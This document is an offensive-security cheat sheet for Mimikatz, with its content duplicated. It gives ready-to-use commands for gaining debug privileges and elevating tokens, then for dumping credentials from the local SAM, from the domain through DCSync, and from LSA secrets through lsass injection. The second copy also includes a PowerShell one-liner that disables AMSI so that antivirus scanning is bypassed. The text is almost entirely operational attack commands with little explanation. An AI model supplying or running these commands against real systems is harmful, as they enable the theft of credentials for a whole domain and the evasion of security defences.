# On Load ```shell # Start logging log mimikatz.log # Get privs privilege::debug token::elevate ``` # Pass Commands via Shell ``` mimikatz log "privilege::debug" "token::elevate" "lsadump::sam System.hiv Sam.hiv" "lsadump::dcsync /domain:domainname.local /all /csv" "lsadump::lsa /inject" exit ``` | Task | Cmd | Notes | | -------------- | -------------------------------------------------------- | ---------------------------------------------------- | | Dump local sam | ```lsadump::sam System.hiv Sam.hiv``` | | | Dump AD sam | ```lsadump::dcsync /domain:domainname.local /all /csv``` | You Dump a specific user wiht ```/user:username``` | | dUMP VIA LSASS | ```lsadump::lsa /inject``` | | # On Load ```shell # Start logging log mimikatz.log # Get privs privilege::debug token::elevate ``` # Pass Commands via Shell ``` powershell -command '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true) .\mimikatz.exe log "privilege::debug" "token::elevate" "lsadump::sam System.hiv Sam.hiv" "lsadump::dcsync /domain:domainname.local /all /csv" "lsadump::lsa /inject" exit ``` | Task | Cmd | Notes | | -------------- | -------------------------------------------------------- | ---------------------------------------------------- | | Dump local sam | ```lsadump::sam System.hiv Sam.hiv``` | | | Dump AD sam | ```lsadump::dcsync /domain:domainname.local /all /csv``` | You Dump a specific user wiht ```/user:username``` | | dUMP VIA LSASS | ```lsadump::lsa /inject``` | |